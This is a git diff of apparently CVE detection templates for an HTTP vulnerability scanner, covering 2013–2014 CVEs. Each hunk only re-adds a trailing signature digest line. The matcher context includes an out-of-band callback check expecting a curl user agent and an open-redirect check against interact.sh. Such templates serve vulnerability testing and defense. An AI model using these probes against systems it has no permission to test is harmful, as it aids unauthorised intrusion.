4a0a004730450220237aa6329024a03408a498114157c8b6e0e7742e5b766bd4fe9ead2832693b810221009a14e4b9ab121c312bd52d3d4d4ad46862b3c3fe0eb11a33256b18618144632f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220237aa6329024a03408a498114157c8b6e0e7742e5b766bd4fe9ead2832693b810221009a14e4b9ab121c312bd52d3d4d4ad46862b3c3fe0eb11a33256b18618144632f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-6281.yaml b/http/cves/2013/CVE-2013-6281.yaml index 99e453572c..c3f22afead 100644 --- a/http/cves/2013/CVE-2013-6281.yaml +++ b/http/cves/2013/CVE-2013-6281.yaml @@ -53,4 +53,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e23670dfdbacdf4a617f6ac17562f0022d897644cb8aabbaed65059668911a7302206a847ecc59f4642a6fdeda19768e712bec8ae4fb6347b44e8d58e2f1cae081cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100e23670dfdbacdf4a617f6ac17562f0022d897644cb8aabbaed65059668911a7302206a847ecc59f4642a6fdeda19768e712bec8ae4fb6347b44e8d58e2f1cae081cc:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-7240.yaml b/http/cves/2013/CVE-2013-7240.yaml index d5710a4d0d..4ef3c07893 100644 --- a/http/cves/2013/CVE-2013-7240.yaml +++ b/http/cves/2013/CVE-2013-7240.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201e43b6ae2e36af23cd1efd93ebbd413a51b783579b99ea169b1a96a4ef49cc85022100effebdbf97d3a65527e39004e61c69e923568ed43197cce117fe1f746761c20a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502201e43b6ae2e36af23cd1efd93ebbd413a51b783579b99ea169b1a96a4ef49cc85022100effebdbf97d3a65527e39004e61c69e923568ed43197cce117fe1f746761c20a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-7285.yaml b/http/cves/2013/CVE-2013-7285.yaml index c95738d911..26b1b9b4fc 100644 --- a/http/cves/2013/CVE-2013-7285.yaml +++ b/http/cves/2013/CVE-2013-7285.yaml @@ -62,4 +62,5 @@ http: part: interactsh_request words: - "User-Agent: curl" -# digest: 4a0a0047304502202780a5305e8eba2c3e14482358bca65431b9dc7f057f7d40f1b9f76077242eef022100c5e52a197835847c42f16b8ddf9d2d4ef82f4422f1c4c61c2418f87f31991e5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202780a5305e8eba2c3e14482358bca65431b9dc7f057f7d40f1b9f76077242eef022100c5e52a197835847c42f16b8ddf9d2d4ef82f4422f1c4c61c2418f87f31991e5a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-1203.yaml b/http/cves/2014/CVE-2014-1203.yaml index f00a5a58ff..cb622427b7 100644 --- a/http/cves/2014/CVE-2014-1203.yaml +++ b/http/cves/2014/CVE-2014-1203.yaml @@ -44,4 +44,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206ee81bfe684f8f316b60614030a94b00733961286c63bf6b241c8e9491e33794022100d9b5f4d999df938b070a3a2d502ea8d3da89035b8dec428151857e9e7e18b408:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502206ee81bfe684f8f316b60614030a94b00733961286c63bf6b241c8e9491e33794022100d9b5f4d999df938b070a3a2d502ea8d3da89035b8dec428151857e9e7e18b408:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-2321.yaml b/http/cves/2014/CVE-2014-2321.yaml index 1b4f83dc99..69f78b3aaa 100644 --- a/http/cves/2014/CVE-2014-2321.yaml +++ b/http/cves/2014/CVE-2014-2321.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b047faea78e7436304fab8ce015b5a1f550733f518f96677780dfc008a26a2e6022100c1d47cbe8171b921e5f84844bf6ebc70766b60ce397d9f5826fcf1dfec5498d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100b047faea78e7436304fab8ce015b5a1f550733f518f96677780dfc008a26a2e6022100c1d47cbe8171b921e5f84844bf6ebc70766b60ce397d9f5826fcf1dfec5498d7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-2962.yaml b/http/cves/2014/CVE-2014-2962.yaml index f87c32d835..d308649129 100644 --- a/http/cves/2014/CVE-2014-2962.yaml +++ b/http/cves/2014/CVE-2014-2962.yaml @@ -40,4 +40,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009e7d502e4e864f1a3db45078bb46a0860f4b0979aa7c4cd74c9a54822049716902200b1d956edd8a9719b7c140b5bc49040c9a21f3166cbcf6dee5fb97694235de91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450221009e7d502e4e864f1a3db45078bb46a0860f4b0979aa7c4cd74c9a54822049716902200b1d956edd8a9719b7c140b5bc49040c9a21f3166cbcf6dee5fb97694235de91:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-3120.yaml b/http/cves/2014/CVE-2014-3120.yaml index 924fe5035a..042ec1d956 100644 --- a/http/cves/2014/CVE-2014-3120.yaml +++ b/http/cves/2014/CVE-2014-3120.yaml @@ -69,4 +69,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210083869a006c5ec363e7ca878c971958e9f925591f0c7db0ba96a9628bc33c97590220262e1b302879c65b1352f13b3fff496db7b1b536c25b3aba9984d2e1fc6fc720:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502210083869a006c5ec363e7ca878c971958e9f925591f0c7db0ba96a9628bc33c97590220262e1b302879c65b1352f13b3fff496db7b1b536c25b3aba9984d2e1fc6fc720:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-3206.yaml b/http/cves/2014/CVE-2014-3206.yaml index 6bf5f67752..2144f737ba 100644 --- a/http/cves/2014/CVE-2014-3206.yaml +++ b/http/cves/2014/CVE-2014-3206.yaml @@ -42,4 +42,5 @@ http: part: interactsh_protocol words: - "http" -# digest: 4b0a00483046022100826846564ba536788f18a4b704fef2b5116bcf5b69e389303e9821902244bd2602210093f708dfa5635edfb0acea37fa9833d9011ba2feb0d7cde944994c2a282e2580:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100826846564ba536788f18a4b704fef2b5116bcf5b69e389303e9821902244bd2602210093f708dfa5635edfb0acea37fa9833d9011ba2feb0d7cde944994c2a282e2580:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-3744.yaml b/http/cves/2014/CVE-2014-3744.yaml index 201f6c5d08..7fcbf1ae22 100644 --- a/http/cves/2014/CVE-2014-3744.yaml +++ b/http/cves/2014/CVE-2014-3744.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d1287f785142727a9e35b71d54ff4a2d0189ee8e268ba8b8eb4224a297c82c60220023463f0766f94804ca5af39fb542d0d2fc26f4e1ea555b47d9931ac7f131bf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200d1287f785142727a9e35b71d54ff4a2d0189ee8e268ba8b8eb4224a297c82c60220023463f0766f94804ca5af39fb542d0d2fc26f4e1ea555b47d9931ac7f131bf7:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4210.yaml b/http/cves/2014/CVE-2014-4210.yaml index 54ee1e8066..1af60ba808 100644 --- a/http/cves/2014/CVE-2014-4210.yaml +++ b/http/cves/2014/CVE-2014-4210.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d430ba095cf5dedf8957a2226af50c04c0f62f7256e435313e7ad7f9cdd3bce0022100ee4061272990e310d334f04b2ecbbdce8fe10c9ee757e8aadbcf02e6a10400dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d430ba095cf5dedf8957a2226af50c04c0f62f7256e435313e7ad7f9cdd3bce0022100ee4061272990e310d334f04b2ecbbdce8fe10c9ee757e8aadbcf02e6a10400dd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4513.yaml b/http/cves/2014/CVE-2014-4513.yaml index bd39d994c3..d772675a21 100644 --- a/http/cves/2014/CVE-2014-4513.yaml +++ b/http/cves/2014/CVE-2014-4513.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d91c53bdf92ab3b46783e1540244ea16ceb6c0a090c0b66e3f449c8c94266cf2022100a2bac5834cd37046c8ff036dd12919b06dfe609651d9eeddc0d48329f6143e65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100d91c53bdf92ab3b46783e1540244ea16ceb6c0a090c0b66e3f449c8c94266cf2022100a2bac5834cd37046c8ff036dd12919b06dfe609651d9eeddc0d48329f6143e65:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4535.yaml b/http/cves/2014/CVE-2014-4535.yaml index b993eaeea6..63277897c3 100644 --- a/http/cves/2014/CVE-2014-4535.yaml +++ b/http/cves/2014/CVE-2014-4535.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f7ca08d649f493a71cd6ca60667d52ce4ddb6220f9cd5f7e21fee032775319100220583fdac98ec4b0e1d99bc4ce7d2b8c5e9b36ad163df8fd1c6fe19cc9a506b2ce:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100f7ca08d649f493a71cd6ca60667d52ce4ddb6220f9cd5f7e21fee032775319100220583fdac98ec4b0e1d99bc4ce7d2b8c5e9b36ad163df8fd1c6fe19cc9a506b2ce:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4536.yaml b/http/cves/2014/CVE-2014-4536.yaml index 5cb4e88f66..7a9a6b828d 100644 --- a/http/cves/2014/CVE-2014-4536.yaml +++ b/http/cves/2014/CVE-2014-4536.yaml @@ -48,4 +48,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a33fe4d09413418f18acb696e2aabf96e8af837bf71987fc55bc6fd1747be2c9022028893d8fa729a7af09675975a6db70df4fe81f6082f0f1edf527cea3a55aaddd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100a33fe4d09413418f18acb696e2aabf96e8af837bf71987fc55bc6fd1747be2c9022028893d8fa729a7af09675975a6db70df4fe81f6082f0f1edf527cea3a55aaddd:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4539.yaml b/http/cves/2014/CVE-2014-4539.yaml index 9e83642d07..cacc9bc76b 100644 --- a/http/cves/2014/CVE-2014-4539.yaml +++ b/http/cves/2014/CVE-2014-4539.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402207956bbe951b23e36cddb9695355e08fb6479726160ef7761b758f1913618e48b0220718e301b1a84e0ff0aada3e3f421d451714c0560cb9fb02bc4e367dc8fe4edc5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402207956bbe951b23e36cddb9695355e08fb6479726160ef7761b758f1913618e48b0220718e301b1a84e0ff0aada3e3f421d451714c0560cb9fb02bc4e367dc8fe4edc5:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4544.yaml b/http/cves/2014/CVE-2014-4544.yaml index 29d2db9b6c..4aa6abe9e0 100644 --- a/http/cves/2014/CVE-2014-4544.yaml +++ b/http/cves/2014/CVE-2014-4544.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100db5b5560431ca6de5293d12108419b8746f5a7a9735f9fa4ea8b65562da46da4022100fa28579b57316ff22454719ac3d72093941beb949a503adcde38d31b5c7225aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100db5b5560431ca6de5293d12108419b8746f5a7a9735f9fa4ea8b65562da46da4022100fa28579b57316ff22454719ac3d72093941beb949a503adcde38d31b5c7225aa:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4550.yaml b/http/cves/2014/CVE-2014-4550.yaml index 9260953bda..4df7a1c7e3 100644 --- a/http/cves/2014/CVE-2014-4550.yaml +++ b/http/cves/2014/CVE-2014-4550.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100df89967db5e0a5ca9c9009ed477f37c07a1f0140e67650b8db563b349e97252b022069033b0a6a1ec361d0e95f66499d076146b5c7f741a4ff48e6f65dec92b56f45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100df89967db5e0a5ca9c9009ed477f37c07a1f0140e67650b8db563b349e97252b022069033b0a6a1ec361d0e95f66499d076146b5c7f741a4ff48e6f65dec92b56f45:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4558.yaml b/http/cves/2014/CVE-2014-4558.yaml index 9bf664f256..60aa6d97cb 100644 --- a/http/cves/2014/CVE-2014-4558.yaml +++ b/http/cves/2014/CVE-2014-4558.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100eb08ff9e8e4e6760fb035c6630bc28665715657dadd8d6f7df9d86d828567786022100820b582f35cc1867ee480b649da8b2eb8e19f9a8429ae468fe1114db080bd715:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100eb08ff9e8e4e6760fb035c6630bc28665715657dadd8d6f7df9d86d828567786022100820b582f35cc1867ee480b649da8b2eb8e19f9a8429ae468fe1114db080bd715:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4561.yaml b/http/cves/2014/CVE-2014-4561.yaml index b196f73a6e..598d1effb4 100644 --- a/http/cves/2014/CVE-2014-4561.yaml +++ b/http/cves/2014/CVE-2014-4561.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022073f426fd4f29ad0b3166c94f0469b65ecd6d729fc125c0b4ae6cf2b6a49448630220227bd09485147a5a252bcfb42b454f08d3418186c3e2876a6c51831d12c95cc8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022073f426fd4f29ad0b3166c94f0469b65ecd6d729fc125c0b4ae6cf2b6a49448630220227bd09485147a5a252bcfb42b454f08d3418186c3e2876a6c51831d12c95cc8:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4592.yaml b/http/cves/2014/CVE-2014-4592.yaml index 8a47464c4b..4597cb4391 100644 --- a/http/cves/2014/CVE-2014-4592.yaml +++ b/http/cves/2014/CVE-2014-4592.yaml @@ -57,4 +57,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203508c8b283a24d007f40fe76533ffaccf03d4b8048209adf181356cd4cf36fc3022100f52fc8d434f54f720c9fe5efc8f20307776b192485dc0d326faa20af8520bdfb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203508c8b283a24d007f40fe76533ffaccf03d4b8048209adf181356cd4cf36fc3022100f52fc8d434f54f720c9fe5efc8f20307776b192485dc0d326faa20af8520bdfb:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4940.yaml b/http/cves/2014/CVE-2014-4940.yaml index 32fdc82a57..d184ecc71a 100644 --- a/http/cves/2014/CVE-2014-4940.yaml +++ b/http/cves/2014/CVE-2014-4940.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202f953b14c00a9f82a2ede808aef90df91c73cfd2a430e6ae8a08ed3510722c46022100fa2dfe2a13bacface1862f8b92ef6f87d57349e9199f36859691d1bab5765f45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502202f953b14c00a9f82a2ede808aef90df91c73cfd2a430e6ae8a08ed3510722c46022100fa2dfe2a13bacface1862f8b92ef6f87d57349e9199f36859691d1bab5765f45:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-4942.yaml b/http/cves/2014/CVE-2014-4942.yaml index 4467a32999..262e458919 100644 --- a/http/cves/2014/CVE-2014-4942.yaml +++ b/http/cves/2014/CVE-2014-4942.yaml @@ -53,4 +53,5 @@ http: group: 1 regex: - '>PHP Version <\/td>([0-9.]+)' -# digest: 4a0a00473045022100d03ec0087a6b46f4fbcefa87040e9350a0c1a13f5d2fcdbe7cc07cdf75e36a3902201e6593aa5cebc231e04cf89954236512e2c9ffd6df2e9ed335d29378cd018ace:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100d03ec0087a6b46f4fbcefa87040e9350a0c1a13f5d2fcdbe7cc07cdf75e36a3902201e6593aa5cebc231e04cf89954236512e2c9ffd6df2e9ed335d29378cd018ace:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-5111.yaml b/http/cves/2014/CVE-2014-5111.yaml index 2091812fd7..26db1fb867 100644 --- a/http/cves/2014/CVE-2014-5111.yaml +++ b/http/cves/2014/CVE-2014-5111.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202ee99b71f04426fe53eda4edb16a89dc060e80f3035ee3fd468a1e2306b71fcc0220559ea82fe476182ead7b277a6c46d2bb780171d491dff2a091f9c49981794286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202ee99b71f04426fe53eda4edb16a89dc060e80f3035ee3fd468a1e2306b71fcc0220559ea82fe476182ead7b277a6c46d2bb780171d491dff2a091f9c49981794286:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-5258.yaml b/http/cves/2014/CVE-2014-5258.yaml index e3ce200147..1b6ffb71bd 100644 --- a/http/cves/2014/CVE-2014-5258.yaml +++ b/http/cves/2014/CVE-2014-5258.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205b384014bb183513453df0338dc4d71e943cabfeb47bf51cc2583001b3eefea2022100a37e4720933058d0efac66f9cf4673f1a79e2802f63a353d5733e299f9259c5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502205b384014bb183513453df0338dc4d71e943cabfeb47bf51cc2583001b3eefea2022100a37e4720933058d0efac66f9cf4673f1a79e2802f63a353d5733e299f9259c5a:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-5368.yaml b/http/cves/2014/CVE-2014-5368.yaml index aaaef78bf0..4f8bd6cc37 100644 --- a/http/cves/2014/CVE-2014-5368.yaml +++ b/http/cves/2014/CVE-2014-5368.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eb8aa3cc781a57b5fd0140c51dcdc069a21f9e118201bfec01017719cba1a785022048971f639d61dfb326e4f12cf8a5dd6f0d12a5b66d1bb0980bb5d29eb9d55c0d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022100eb8aa3cc781a57b5fd0140c51dcdc069a21f9e118201bfec01017719cba1a785022048971f639d61dfb326e4f12cf8a5dd6f0d12a5b66d1bb0980bb5d29eb9d55c0d:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-6308.yaml b/http/cves/2014/CVE-2014-6308.yaml index 2336fcd5c2..237a48f8e1 100644 --- a/http/cves/2014/CVE-2014-6308.yaml +++ b/http/cves/2014/CVE-2014-6308.yaml @@ -41,4 +41,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402202a2e4bfe2dc1011e3d341f848685d44952574c04be0b42b250bf7fe642a8a1b90220522e43b5dcf47de461b5d231a1667dc7fe24222a3a4eaaafad9ddabef743598c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402202a2e4bfe2dc1011e3d341f848685d44952574c04be0b42b250bf7fe642a8a1b90220522e43b5dcf47de461b5d231a1667dc7fe24222a3a4eaaafad9ddabef743598c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-8676.yaml b/http/cves/2014/CVE-2014-8676.yaml index 13ec2c87d0..5e58e532ba 100644 --- a/http/cves/2014/CVE-2014-8676.yaml +++ b/http/cves/2014/CVE-2014-8676.yaml @@ -42,4 +42,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502200bd03ed8725626744e3ff59ba39b836ef2aef3aa6174912119fe7af4b5bb61b1022100dfe8f60466ff8a8d1ed602d85af293e43065657c10ebda3186e0b4825125b598:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502200bd03ed8725626744e3ff59ba39b836ef2aef3aa6174912119fe7af4b5bb61b1022100dfe8f60466ff8a8d1ed602d85af293e43065657c10ebda3186e0b4825125b598:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-8682.yaml b/http/cves/2014/CVE-2014-8682.yaml index 0140187c57..3adb1f8c63 100644 --- a/http/cves/2014/CVE-2014-8682.yaml +++ b/http/cves/2014/CVE-2014-8682.yaml @@ -47,4 +47,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022013821ee44e1295e633459a59c631e1edc9cb31001fcf8960332f3f2083892e04022100bdd510c322afaf0168fe4332e28f55b301e59695dcef0998ed83ad4b549ce078:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a00473045022013821ee44e1295e633459a59c631e1edc9cb31001fcf8960332f3f2083892e04022100bdd510c322afaf0168fe4332e28f55b301e59695dcef0998ed83ad4b549ce078:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9094.yaml b/http/cves/2014/CVE-2014-9094.yaml index 8fd0b07be7..f3300f33d0 100644 --- a/http/cves/2014/CVE-2014-9094.yaml +++ b/http/cves/2014/CVE-2014-9094.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a885b00d7c07a68ee3f13aa9ffaed1d15e8c7b003acdf03c678320bd5a78f01e02210087c2cdf978dddca66a2cf5960b9f523550626a90027f1312b362d428bc41e89f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100a885b00d7c07a68ee3f13aa9ffaed1d15e8c7b003acdf03c678320bd5a78f01e02210087c2cdf978dddca66a2cf5960b9f523550626a90027f1312b362d428bc41e89f:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9119.yaml b/http/cves/2014/CVE-2014-9119.yaml index ce82014fa0..67cccbb882 100644 --- a/http/cves/2014/CVE-2014-9119.yaml +++ b/http/cves/2014/CVE-2014-9119.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203689813eda7414e9d3e129e4ef2ee68c95cb31920ec19bdc35719839be903e45022100a95c61868924ba74b8dd4e4fc1ebcd0c947b877099c0f863949dcbd9c42934ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a0047304502203689813eda7414e9d3e129e4ef2ee68c95cb31920ec19bdc35719839be903e45022100a95c61868924ba74b8dd4e4fc1ebcd0c947b877099c0f863949dcbd9c42934ef:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9180.yaml b/http/cves/2014/CVE-2014-9180.yaml index 75663e264b..4072c3a0e5 100644 --- a/http/cves/2014/CVE-2014-9180.yaml +++ b/http/cves/2014/CVE-2014-9180.yaml @@ -37,4 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 490a00463044022071affdd6c2ffe87a581c513d27e7bbc36ee62be95561a209078deadad5e08e1b02207b2504ab41329375dc32a326dbd714cdfdd02a2f27496de3a7a8e4c2a30b5c85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a00463044022071affdd6c2ffe87a581c513d27e7bbc36ee62be95561a209078deadad5e08e1b02207b2504ab41329375dc32a326dbd714cdfdd02a2f27496de3a7a8e4c2a30b5c85:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9444.yaml b/http/cves/2014/CVE-2014-9444.yaml index 77cb27cddd..66bb526dc3 100644 --- a/http/cves/2014/CVE-2014-9444.yaml +++ b/http/cves/2014/CVE-2014-9444.yaml @@ -46,4 +46,5 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210094203f7ae1c8eee27f01d3fe5a65e56dc5a668c097d9f17c527feab486e7e04d02210099ca9c35d54e236faa2b325ddd55be18c22b05baf341accfdc658fb9c21add96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a0048304602210094203f7ae1c8eee27f01d3fe5a65e56dc5a668c097d9f17c527feab486e7e04d02210099ca9c35d54e236faa2b325ddd55be18c22b05baf341accfdc658fb9c21add96:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9606.yaml b/http/cves/2014/CVE-2014-9606.yaml index 0cc0d07d3f..c576e94714 100644 --- a/http/cves/2014/CVE-2014-9606.yaml +++ b/http/cves/2014/CVE-2014-9606.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220183f6598755fb1a54ccef9d3ececa18e3b83313c8dc5b1b3245a315af595f5dc022100aefe91c0de7064d1385cebe62867074cb80629391c83f99cbb9179d23eebab33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4a0a004730450220183f6598755fb1a54ccef9d3ececa18e3b83313c8dc5b1b3245a315af595f5dc022100aefe91c0de7064d1385cebe62867074cb80629391c83f99cbb9179d23eebab33:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9607.yaml b/http/cves/2014/CVE-2014-9607.yaml index 794d532d6d..32287c7101 100644 --- a/http/cves/2014/CVE-2014-9607.yaml +++ b/http/cves/2014/CVE-2014-9607.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100fc1b3b5453413260750b1a07e626975fb5eacfe95ccf65df1dc1943abacb122a022100e90411ded509d2e8b9423922981bdf2ad9a6df6f54ff10a01a7382fb41145a67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100fc1b3b5453413260750b1a07e626975fb5eacfe95ccf65df1dc1943abacb122a022100e90411ded509d2e8b9423922981bdf2ad9a6df6f54ff10a01a7382fb41145a67:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9608.yaml b/http/cves/2014/CVE-2014-9608.yaml index 0b9bf625bb..7e951ea29b 100644 --- a/http/cves/2014/CVE-2014-9608.yaml +++ b/http/cves/2014/CVE-2014-9608.yaml @@ -53,4 +53,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402201ee23c3410c6f2df5c4d6173372bfff587c10c54b6e065bc74acf9413cfbe26a022010c4e0c872b3f0b74a835631d2f14bb90eaf41239efd466e94fa125b4df15ccf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402201ee23c3410c6f2df5c4d6173372bfff587c10c54b6e065bc74acf9413cfbe26a022010c4e0c872b3f0b74a835631d2f14bb90eaf41239efd466e94fa125b4df15ccf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9609.yaml b/http/cves/2014/CVE-2014-9609.yaml index 7f10e06ac5..8a4eac4970 100644 --- a/http/cves/2014/CVE-2014-9609.yaml +++ b/http/cves/2014/CVE-2014-9609.yaml @@ -39,4 +39,5 @@ http: - type: status status: - 200 -# digest: 490a0046304402200bdd4d5762a92ac1f47223e8dd24957d0c1f981cbed087c309636b0a57c8f20c022072f11180cddc4c7b6864a57b29bea5ee0972ce7e6a0fed4b1ddf69208f25dc18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 490a0046304402200bdd4d5762a92ac1f47223e8dd24957d0c1f981cbed087c309636b0a57c8f20c022072f11180cddc4c7b6864a57b29bea5ee0972ce7e6a0fed4b1ddf69208f25dc18:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9614.yaml b/http/cves/2014/CVE-2014-9614.yaml index 4c1f788012..f04fe19634 100644 --- a/http/cves/2014/CVE-2014-9614.yaml +++ b/http/cves/2014/CVE-2014-9614.yaml @@ -52,4 +52,5 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100da473e8f7ab089cc254698778df447599a8e9751b966ef4f4a05730d8f39c6d1022100c27ce5e9e286a8ab7ce221f76093194058f6ce8e70deb463191e4eef0e2b4d96:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 4b0a00483046022100da473e8f7ab089cc254698778df447599a8e9751b966ef4f4a05730d8f39c6d1022100c27ce5e9e286a8ab7ce221f76093194058f6ce8e70deb463191e4eef0e2b4d96:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2014/CVE-2014-9615.yaml b/http/cves/2014/CVE-2014-9615.yaml index 690524c9b6..40548ce0c2 100644 --- a/http/cves/2014/CVE-2014-9615.yaml +++ b/http/cves/2014/CVE-2014-9615.yaml @@ -45,4 +45,5 @@ http: - type: status status: - 200 -# digest: 490a004630440220427e69dd7046a664d6e14cf29a5e00484e43eeca45ff2d5ab73653555efeaa020220499f2eb01f5ce909b7104bc017851a57c5eaf88dd9dcb48870211aa5ef6cc7f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file + +# digest: 